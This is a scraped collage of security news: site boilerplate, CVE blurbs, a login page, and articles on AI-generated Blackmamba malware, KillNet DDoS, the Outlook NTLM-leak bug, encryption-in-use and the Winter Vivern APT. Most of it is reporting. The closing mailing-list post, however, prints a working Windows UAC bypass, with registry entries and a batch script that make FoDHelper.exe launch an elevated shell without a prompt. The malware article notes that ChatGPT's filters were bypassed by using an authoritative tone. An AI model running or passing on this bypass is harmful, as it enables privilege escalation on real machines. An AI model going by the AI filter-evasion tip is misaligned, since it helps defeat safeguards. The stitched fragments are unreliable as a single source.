Categories: News
Tags: Becky Holmes

Tags:  Lock and Code S04E06

Tags:  ransomware

Tags:  WhatsApp

Tags:  AI chatbot

Tags:  investment fraud

Tags:  Clop

Tags:  Microsoft zero-day

Tags:  Microsoft

Tags:  STALKER 2

Tags:  Facebook

Tags:  Microsoft OneNote

Tags:  LockBit

Tags:  Rubrik

The most interesting security related news from the week of March 13 to 19.



(Read more...)




The post A week in security (March 13 - 19) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (March 13 - 19)

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

By Deeba Ahmed
The ChatGPT-powered Blackmamba malware works as a keylogger, with the ability to send stolen credentials through Microsoft Teams.
This is a post from HackRead.com Read the original post: ChatGPT-powered polymorphic Blackmamba malware evades detection

****The malware can target Windows, macOS and Linux devices.****

HYAS Institute researcher and cybersecurity expert, Jeff Sims, has developed a new type of ChatGPT\-powered malware named Blackmamba, which can bypass Endpoint Detection and Response (EDR) filters.

This should not come as a surprise, as in January of this year, cybersecurity researchers at CyberArk also reported on how ChatGPT could be used to develop polymorphic malware. During their investigation, the researchers were able to create the polymorphic malware by bypassing the content filters in ChatGPT, using an authoritative tone.

As per the HYAS Institute’s report (PDF), the malware can gather sensitive data such as usernames, debit/credit card numbers, passwords, and other confidential data entered by a user into their device.

The ChatGPT-powered Blackmamba keylogger in action (Screenshot credit: Jeff Sims)

Once it captures the data, Blackmamba employs MS Teams webhook to transfer it to the attacker’s Teams channel, where it is “analyzed, sold on the dark web, or used for other nefarious purposes,” according to the report.

Jeff used MS Teams because it enabled him to gain access to an organization’s internal sources. Since it is connected to many other vital tools like Slack, identifying valuable targets may be more manageable.

Jeff created a polymorphic keylogger, powered by the AI-based ChatGPT, that can modify the malware randomly by examining the user’s input, leveraging the chatbot’s language capabilities.

The researcher was able to produce the keylogger in Python 3 and create a unique Python script by running the python exec() function every time the chatbot was summoned. This means that whenever ChatGPT/text-DaVinci-003 is invoked, it writes a unique Python script for the keylogger.

This made the malware polymorphic and undetectable by EDRs. Attackers can use ChatGPT to modify the code to make it more elusive. They can even develop programs that malware/ransomware developers can use to launch attacks.

Researcher’s discussion with ChatGPT

Jeff made the malware shareable and portable by employing auto-py-to-exe, a free, open-source utility. This can convert Python code into .exe files that can operate on various devices, such as macOS, Windows, and Linux systems. Additionally, the malware can be shared within the targeted environment through social engineering or email.

It is clear that as ChatGPT’s machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.

**What is Polymorphic malware?**

Polymorphic malware is a type of malicious software that changes its code and appearance every time it replicates or infects a new system. This makes it difficult to detect and analyze by traditional signature-based antivirus software because the malware appears different each time it infects a system, even though it performs the same malicious functions.

Polymorphic malware typically achieves its goal by using various obfuscation techniques such as encryption, code modification, and different compression methods. The malware can also mutate in real time by generating new code and unique signatures to evade detection by security software.

The use of polymorphic malware has become more common in recent years as cybercriminals seek new and innovative ways to bypass traditional security measures. The ability to morph and change its code makes it difficult for security researchers to develop effective security measures to prevent attacks, making it a significant threat to organizations and individuals alike.

1.  ARMO integrates ChatGPT to secure Kubernetes
2.  Scammers Pose as ChatGPT in New Phishing Scam
3.  Russian Hackers Eager to Bypass ChatGPT Restrictions

ChatGPT-powered polymorphic Blackmamba malware evades detection

DDoS cyberattack campaigns from the pro-Russian group have spiked significantly.

The pro-Russian hacktivist group KillNet, which launches its campaigns against countries supporting Ukraine, is ramping up its daily distributed denial-of-service (DDoS) attacks against healthcare organizations.

Microsoft's Azure Network Security has released an overview of the group's attack patterns based off recent campaigns and found that the number of daily DDoS attacks, known as a type of cyberattack that can slow down systems by sending too many connection requests to a server, used against Azure healthcare organizations went up to 40-60 attacks in February, compared with 10-20 daily attacks last November. 

The victim organizations of the attacks ranged from pharmaceutical companies to hospitals to health insurance and health services, according to the brief, which included data on how organizations can protect themselves and customers moving forward: "Enable DDoS network protection, design your application with DDoS best practices in mind, ensure it's protected before an attack occurs, create a DDoS response plan, reach out for help during an attack, and learn and adapt after an attack."

Though KillNet's attacks haven't done much to significantly disrupt any of the organizations that have been targeted so far, there's potential for the group to become more dangerous. The group's focus on critical infrastructure makes it essential that organizations take the steps necessary to protect themselves from future DDoS campaigns, Azure warned.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Azure Warns on Killnet's Growing DDoS Onslaught Against Healthcare

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 10 and March 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for March 10 to March 17

Snowballing PoC exploits for CVE-2023-23397 and a massive attack surface means almost business user could be a victim.

Microsoft recently patched a zero-day vulnerability under active exploit in Microsoft Outlook, identified as CVE-2023-23397, which could enable an attacker to perform a privilege escalation, accessing the victim's Net-NTLMv2 challenge-response authentication hash and impersonating the user.

Now it's becoming clear that CVE-2023-23397 is dangerous enough to become the most far-reaching bug of the year, security researchers are warning. Since disclosure just three days ago, more proof-of-concept (PoC) exploits have sprung onto the scene, which are sure to translate into snowballing criminal interest — helped along by the fact that no user interaction is required for exploitation.

If patching isn't possible quickly, there are some options for addressing the issue, noted below.

**Easy Exploit: No User Interaction Necessary**

The vulnerability allows the attackers to steal NTLM authentication hashes by sending malicious Outlook notes or tasks to the victim. These trigger the exploit automatically when they're retrieved and processed by the Outlook client, which could lead to exploitation before the email is viewed in the Preview Pane. In other words, a target doesn’t actually have to open the email to fall victim to an attack.

Discovered by researchers from Ukraine's Computer Emergency Response Team (CERT) and by one of Microsoft’s own researchers — and patched earlier this week as part of Microsoft's Patch Tuesday update — the bug affects those running an Exchange server and the Outlook for Windows desktop client. Outlook for Android, iOS, Mac, and Outlook for Web (OWA) are unaffected.

"External attackers could send specially crafted emails that will cause a connection from the victim to an external UNC location of attackers' control," says Mark Stamford, founder and CEO of OccamSec. This will leak the Net-NTLMv2 hash of the victim to the attacker, who can then relay this to another service and authenticate as the victim, he explains.

**A Range of Potential Exploit Impacts**

Nick Ascoli, founder and CEO of Foretrace, points out while Microsoft didn't mention how the criminals were using it within their attacks, it allows the reuse of the stolen authentication to connect to other computers over the network for lateral movement.

"The range of possible attacks could go from data exfiltration to potentially installing malware, depending on the permissions of the victim," he says.

Bud Broomhead, CEO at Viakoo, notes that "the likely victims are ones most susceptible to business email compromise (BEC) and to having their identity used for other forms of exploits." He points out there are a few areas that this potentially impacts, the most serious being identity management and trust of internal email communications.

"The risks also include breaching of core IT systems, distribution of malware, business email compromise for financial gain, and disruption of business operations and business continuity," Broomhead cautions.

**Is This the "It" Bug of 2023?**

Viakoo's Broomhead says that while at this point in 2023 there could be many possible "It" bugs coming from Microsoft, this is certainly a contender.

"Because it impacts organizations of all types and sizes, has disruptive methods of mitigation, and training employees on it won’t stop it, this could be a vulnerability that requires more significant effort to mitigate and remediate," he explains.

He notes the attack surface is at least as big as the user base of desktop Outlook (massive), and potentially core IT systems connected to Windows 365 (very massive), and even any recipients of emails sent through Outlook (pretty much everyone).

Then as mentioned, the PoCs that are circulating makes the situation even more attractive to cybercriminals.

"Since the vulnerability is public and instructions for a proof-of-concept are well documented now, other threat actors may adopt the vulnerability in malware campaigns and target a more widespread audience," adds Daniel Hofmann, CEO of Hornetsecurity. "Overall, exploiting the vulnerability is simple, and public proofs-of-concept can already be found on GitHub and other open forums."

What should businesses do? They may have to look beyond patching, Broomhead warns: "Mitigation in this case is difficult, as it causes disruption in how emails systems and users within it are configured."

**How to Protect Against CVE-2023-23397**

For those unable to patch right away, Hornetsecurity's Hofmann says that to better protect the organization, administrators should block TCP 445/SMB outbound traffic to the Internet from the network using perimeter firewalls, local firewalls, and VPN settings.

"This action prevents the transmission of NTLM authentication messages to remote file shares, helping to address CVE-2023-23397," he explains.

Organizations should also add users to the "Protected Users Security Group" in Active Directory to prevent NTLM as an authentication mechanism.

"This approach simplifies troubleshooting compared to other methods of disabling NTLM," Broomhead says. "It is particularly useful for high-value accounts, such as domain administrators."

He points out Microsoft has provided a script to identify and clean up or remove Exchange messages with UNC paths in message properties, and it advises administrators to apply the script to determine if they have been affected by the vulnerability and to remediate it.

Microsoft Outlook Vulnerability Could Be 2023's 'It' Bug

Rockwell Automation Modbus TCP Server AOI prior to 2.04.00 is vulnerable to an unauthorized user sending a malformed message that could cause the controller to respond with a copy of the most recent response to the last valid request. If exploited, an unauthorized user could read the connected device’s Modbus TCP Server AOI information.

Skip Navigation

menu

*   Support Center
*   Get Support Chat & Submit a Question Phone Support Holiday Schedule
*   Training & Webinars
*   Online Forum
*   Customer Care Customer Care Overview Phone Support Holiday Schedule

Sign In

Quickly log in or create an account using an existing service

Yahoo

What will happen: When you click on this button you will be taken to Yahoo. Once you log in, Yahoo will verify you and send you back here where you'll be logged in!

Log In or Create an AccountOpens new dialog

Please log in to continue, Username Password

Email Address \*

Username \*

Password

Re-enter a value for the field 'Password'

Must match Password

First Name \*

Last Name \*

Forgot your username or password?

The page will refresh upon submission. Any pending input will be lost.

03-Feb-2022 - Important product notice regarding Microsoft vulnerability patch (MS KB5004442)

Current product hierarchy

1.  Automation Control
2.  Programmable Controllers

ID: PN1619 | Access Levels: Everyone

**Search**

Did you mean:

**Published Date**Published Date 03/16/2023

Executive Summary

Rockwell Automation received a report from researchers at Veermata Jijabai Technological Institute of a vulnerability that was contained within the Modbus TCP Server Add-On Instructions (AOI) for Cont...

**Login Required to View Full Answer Content**

Please use the 'Sign In' button above

CVE-2023-0027: Modbus TCP AOI Server Could Leak Sensitive Information

If the approaches stand up to scrutiny, companies may soon be able to encrypt most databases in a way that allows using data without needing to decrypt to plaintext.

Pervasive encryption that protects data not just in transit and at rest, but in use — thus freeing companies of the fear of data breaches — has long been a dream of business executives, IT teams, and compliance professionals.

In 2023, those dreams may become a practical reality, with a number of database and data-security firms releasing software to allow companies to keep data encrypted while still allowing common operations, such as searching. Last year, for example, database-technology provider MongoDB released a preview of its Queryable Encryption capability, which allows companies to search for data records in "expressive" ways without needing to decrypt the data. And, this week, data security firm Vaultree released a software development kit to allow application makers to try its Data-in-Use Encryption feature, which — the company claims — allows more extensive operations on encrypted data.

The goal is to allow companies and their applications the ability to access and search databases efficiently, while preventing unauthorized users from ever decrypting sensitive information, says Kenn White, security principal at MongoDB.

"What we hear a lot from customers is concerns around leaks, breaches, and attacks on public cloud infrastructure, including privileged users, and so we're focused on areas where we can add additional security controls and technical measures to limit who can see sensitive data in real time," he says. "\[W\]e believe \[encryption-in-use\] will continue to be an area with a lot of potential for innovation, particularly for operational workloads."

The technologies promise to help organizations minimize the so-called "blast radius" when a network or system is compromised. Typically, businesses suffering a breach face a cascade of forensic investigations, regulatory filings and fines, and the potential exposure of sensitive data and intellectual property. Encrypted data allows companies to sidestep many of the devastating impacts of a breach, but has typically required complex data architecture designs to make sure plaintext information is not inadvertently left insecure.

Many technology companies have attempted to solve the problem and allow the secure use of data by applications by extending the use of encryption. In the 2010s, for example, Ionic Security aimed to encrypt all data on the fly and only allow its use by authorized users with specific privileges. Twilio bought the company in 2021.

If the current crop of technologies succeed where others have failed, companies could see significantly less risk in the event of a breach, says Ryan Lasmaili, CEO at Vaultree.

"We know if there's a leak, and the data is fully encrypted, it reduces the company's risk immediately to regulatory compliance," he says. "But GDPR right now, for example, does not cover data-in-use encryption, because to date, it has been seen as not being there yet."

**Avoiding Llamas in the Indy 500**

MongoDB's Queryable Encryption encrypts database fields, meaning that the information is cryptographically secure at all times, yet can still be used for searching. The keys for decrypting the information are stored with each client, giving only specific people and devices the ability to decrypt sensitive fields. Even a database administrator cannot decrypt every field unless they have the proper keys.

    

A flow chart of how Queryable Encryption works. Source: MongoDB

Making the technologies a reality relied on research by small groups of academic cryptographers. Queryable Encryption, for example, came from the work of Seny Kamara and Tarik Moataz, both of Brown University, who went on to create a startup, Aroki Software, which was purchased by MongoDB in 2021.

The goal of Queryable Encryption is to deliver technology today that can handle queries that are actually useful and make the capability easy for developers, MongoDB's White said during a presentation at the USENIX ENIGMA Conference in January. Key to all that is that performance should not get in the way, he said.

"It has to be sub-linear — the difference between 1,000 documents, a million, 5 million, and 100 million documents, it should be sub-linear," he said. "A lot of the academic work had been done in a way that was super-linear, so works great on 10 records, or 100, 1,000, 5,000 — beyond that, it's painful. And you can throw more CPUs at it, but you know, it's kind of like racing the Indy 500 with llamas — there's only so much you can do."

Other technologies, like fully homomorphic encryption (FHE), promise to allow a more extensive range of operations on encrypted data and have been extensively funded by the US Department of Defense. A team from Intel and Microsoft signed a multiyear research grant with the DoD in 2021 under the DARPA Data Protection in Virtual Environments (DPRIVE) program to create a hardware accelerator to speed up the notorious processing-intensive FHE approaches. In January, Duality Technologies, another DPRIVE grant recipient, announced it was named to Phase 2 of that program to accelerate machine-learning processing on encrypted data.

"Structured encryption, like most encryption schemes, protects data confidentiality — this means that data is protected in a way where only people approved to receive the data actually have access to this data," says Kurt Rohloff, chief technology officer at Duality Technologies. "FHE also provides data confidentiality, but allows more processing on the data without requiring decryption."

**More Testing Needed**

New encryption models and technologies typically require a marathon of testing and evaluation. MongoDB's Queryable Encryption stemmed from academic research on structured encryption, with several papers describing the approach. FHE has had decades of research and open development. Vaultree's Data-in-Use Encryption remains, to a large degree, a black box, although CEO Lasmaili pledges that scientific papers will be forthcoming.

In a blog on the possibilities of pervasive encryption, cybersecurity firm Kaspersky warned that such technologies require a great deal of oversight, because even small missteps can undermine the security of the systems.

"This happens to be a common problem of practical cryptography — when the developers of an information system feel compelled to craft something in-house that meets their particular data encryption requirements," the company stated. "This 'something' then often turns out to be vulnerable because the development process failed to take into account the latest scientific research."

While encryption-in-use may claim an early lead because it is usable in its current state, breakthroughs in FHE may win in the long run, especially as quantum computing may end up being a differentiator. FHE continues to have functional and security benefits, especially in a post-quantum encryption world, says Duality Technologies' Rohloff.

"Fully homomorphic encryption does allow many more secure operations on it as compared to general structured encryption," he says. "Not all variations of structured encryption \[are\] protected against quantum computing attacks, but all used fully homomorphic encryption schemes are believed to be protected against quantum computing attacks."

Technology Firms Delivering Much-Sought Encryption-in-Use

The "underreported" APT has returned to focus after attacks promoting Russian and Belarusian government interests and going after targets with humor, zest, and scrappiness.

A politically motivated cyber threat that's hardly discussed in the public sphere has made a sort of comeback in recent months, with campaigns against government agencies and individuals in Italy, India, Poland, and Ukraine.

"Winter Vivern" (aka UAC-0114) has been active since at least December 2020. Analysts tracked its initial activity in 2021, but the group has remained out of the public eye in the years since. That is, until attacks against Ukrainian and Polish government targets inspired reports on resurgent activity earlier this year from the Central Cybercrime Bureau of Poland, and the State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine.

In a follow-on analysis published this week, Tom Hegel, senior threat researcher at SentinelOne, further elucidated the group's TTPs and emphasized its close alignment "with global objectives that support the interests of Belarus and Russia's governments," noting that it should be classified as an advanced persistent threat (APT) even though its resources aren't on the par of its other Russian-speaking peers.

**Winter Vivern, a 'Scrappy' Threat Actor**

Winter Vivern, whose name is a derivative of the wyvern, a type of biped dragon with a poisonous, pointed tail "falls into a category of scrappy threat actors," Hegel wrote. They're "quite resourceful and able to accomplish a lot with potentially limited resources, while willing to be flexible and creative in their approach to problem solving."

The group's most defining characteristic is its phishing lures — usually documents mimicking legitimate and publicly available government literature, which drop a malicious payload upon being opened. More recently, the group has taken to mimicking government websites to distribute their nasties. Vivern has a sense of humor, mimicking homepages belonging to the primary cyber-defense agencies of Ukraine and Poland, as seen below.

Source: SentinelOne

The group's most tongue-in-cheek tactic, though, is to disguise its malware as antivirus software. Like their many other campaigns, "the fake scanners are pitched through email to targets as government notices," Hegel tells Dark Reading.

These notices instruct recipients to scan their machines with this supposed antivirus software. Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background.

That payload, in recent months, has commonly been Aperitif, a Trojan that collects details about victims, establishes persistence on a target machine, and beacons out to an attacker-controlled command-and-control server (C2).

Source: SentinelOne

The group employs many other tactics and techniques, too. In a recent campaign against Ukraine's I Want to Live hotline, they resorted to an old favorite: a macro-enabled Microsoft Excel file.

And "when the threat actor seeks to compromise the organization beyond the theft of legitimate credentials," Hegel wrote in his post, "Winter Vivern tends to rely on shared toolkits and the abuse of legitimate Windows tools."

**Winter Vivern, APT, or Hacktivists?**

The Winter Vivern story is scattershot and leads to a somewhat confused profile.

Its targets are pure APT: Early in 2021, researchers from DomainTools were parsing Microsoft Excel documents using macros when they came upon one with a rather innocuous name: "contacts." The contacts macro dropped a PowerShell script that contacted a domain that'd been active since December 2020. Upon further investigation, the researchers discovered more than they'd bargained for: other malicious documents targeting entities within Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and even the Vatican.

The group was clearly still active by the summertime, when Lab52 published news of an ongoing campaign matching the same profile. But it wasn't until January 2023 that it resurfaced in the public eye, following campaigns against individual members of the Indian government, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and other European government agencies.

"Of particular interest," Hegel noted in his blog post, "is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war."

This special emphasis on Ukraine adds intrigue to the story since, as recently as February, the Ukraine government was only able to conclude "with a high level of confidence" that "Russian-speaking members are present" within the group. Hegel has now gone a step further, by directly correlating the group with Russian and Belarusian state interests.

"With the potential ties into Belarus, it's challenging to determine if this is a new organization or simply new tasking from those we know well," Hegel tells Dark Reading.

Even so, the group doesn't fit the profile of a typical nation-state APT. Their lack of resources, their "scrappiness" — relative to their heavy-hitting counterparts like Sandworm, Cozy Bear, Turla, and others — place them in a category nearer to more ordinary hacktivism. "They do possess technical skills to accomplish initial access, however, at this time they don't stack up to highly novel Russian actors," Hegel says.

Beyond the limited capacities, "their very limited set of activity and targeting is why they are so unknown in the public," Hegel says. It may be in Winter Vivern's favor, in the end. So long as it lacks that extra bite, it may continue to fly under the radar.

Low-Budget 'Winter Vivern' APT Awakens After 2-Year Hibernation

This write up is an overview of how Microsoft's attempts to manage elevated access to executables via registry entries has added over complexity that still allows for escalation.

    Hi @ll,with Windows 2000, Microsoft virtualised the [HKEY_CLASSES_ROOT] registrybranch: what was just an alias for [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]before became the overlay of [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] and[HKEY_CURRENT_USER\Software\Classes] with the latter having precedence:<https://msdn.microsoft.com/en-us/library/ms724498.aspx>Note: while [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] is writable only by      (privileged) administrators, [HKEY_CURRENT_USER\Software\Classes]      is writable by the (current) unprivileged user.With Windows Vista they introduced the "security theatre" called"User Account Control" (a far better name is "qUACkery"):<https://blogs.msdn.microsoft.com/uac/2005/12/08/user-account-control/>| User Account Protection was the preliminary name for a core security| component of Windows Vista. The component has now been officially named| User Account Control (UAC).The qUACkery sort of lobotomises administrator accounts and splits theirbrain^Waccess token: the "shell", i.e. EXPLORER.exe, and all programs runfrom it use a restricted access token without administrative privileges.For the (not so few) programs which but need administrative privileges,Microsoft introduced a "kill switch" in the application manifest:<https://msdn.microsoft.com/en-us/library/aa374191.aspx><https://msdn.microsoft.com/en-us/library/bb756929.aspx>| <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">|    <security>|       <requestedPrivileges>|          <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />|       </requestedPrivileges>|    </security>| </trustInfo>With this loop^Wwormhole, the virtualised [HKEY_CLASSES_ROOT] introducedwith Windows 2000 became but a can of worms: in STANDARD installations ofWindows, applications running with administrative privileges, i.e. anintegrity level above "Medium", now evaluate registry settings (COM CLSIDs,ProgIDs, URL protocols, ...) which are under control of the unprivilegeduser.<https://msdn.microsoft.com/en-us/library/ms724498.aspx>| If an application is run with administrator rights and User Account| Control is disabled, the COM runtime ignores per-user COM configuration| and accesses only per-machine COM configuration.<https://msdn.microsoft.com/en-us/library/bb756926.aspx>| Beginning with Windows Vista® and Windows Server® 2008, if the| integrity level of a process is higher than Medium, the COM runtime| ignores per-user COM configuration and accesses only per-machine| COM configuration. This action reduces the surface area for elevation| of privilege attacks, preventing a process with standard user privileges| from configuring a COM object with arbitrary code and having this code| called from an elevated process.OOPS: COM CLSIDs have been removed from the can of worms.But what about ProgIDs and URL protocols?<https://msdn.microsoft.com/en-us/library/cc144152.aspx>Demonstration:~~~~~~~~~~~~~~1) Start the command processor in the user account created during   Windows setup;2) Execute the "Feature on Demand" helper application FoDHelper.exe   (which requires administrative privileges, but elevates SILENTLY),   then close the "Immersive Control Panel" window it opened;3) Add the following registry entries to replace the application run   by the elevated FoDHelper.exe from "Immersive Control Panel" to   "Windows Command Processor" (or an arbitrary other one):   [HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command]   @="C:\\Windows\\System32\\Cmd.exe"   [HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer]   @="qUACkery"4) Execute FoDHelper.exe again;5) Remove the registry entries created in step 3.If you prefer a batch script:--- quackery.cmdREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command" /VE /T REG_SZ /D "%COMSPEC%" /FREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer" /VE /T REG_SZ /D "qUACkery" /FFoDHelper.exeREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\MS-Settings" /FREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\qUACkery" /F--- EOF ---OOPS: Windows Defender blocks the execution of FoDHelper.exeSpoiler: installation of another anti-virus, for example McAfee,         Bitdefender, Eset, Sophos, Avira, AVG/Avast, TrendMicro,         deactivates Windows Defender and lets FoDHelper.com run         an arbitrary application elevated, without UAC prompt.stay tuned, and far away from the eternally vulnerable crap oozing out of RedmondStefan KanthakPS: finding the applications which call the ProgIDs/URL protocols    ms-settings-airplanemode, ms-settings-bluetooth, ms-settings-cellular,    ms-settings-connectabledevices, ms-settings-displays-topology,    ms-settings-emailandaccounts, ms-settings-language, ms-settings-location,    ms-settings-lock, ms-settings-mobilehotspot, ms-settings-notifications,    ms-settings-power, ms-settings-privacy, ms-settings-proximity,    ms-settings-screenrotation, ms-settings-wifi, ms-settings-workplace    is left as an exercise to the reader.PPS: for all these URL protocols, the wise guys from Redmond added the     following registry entries to ease their exploitation:     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings]     "WarnOnOpen"=dword:00000000     ...     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings-workplace]     "WarnOnOpen"=dword:00000000

Tag

#microsoft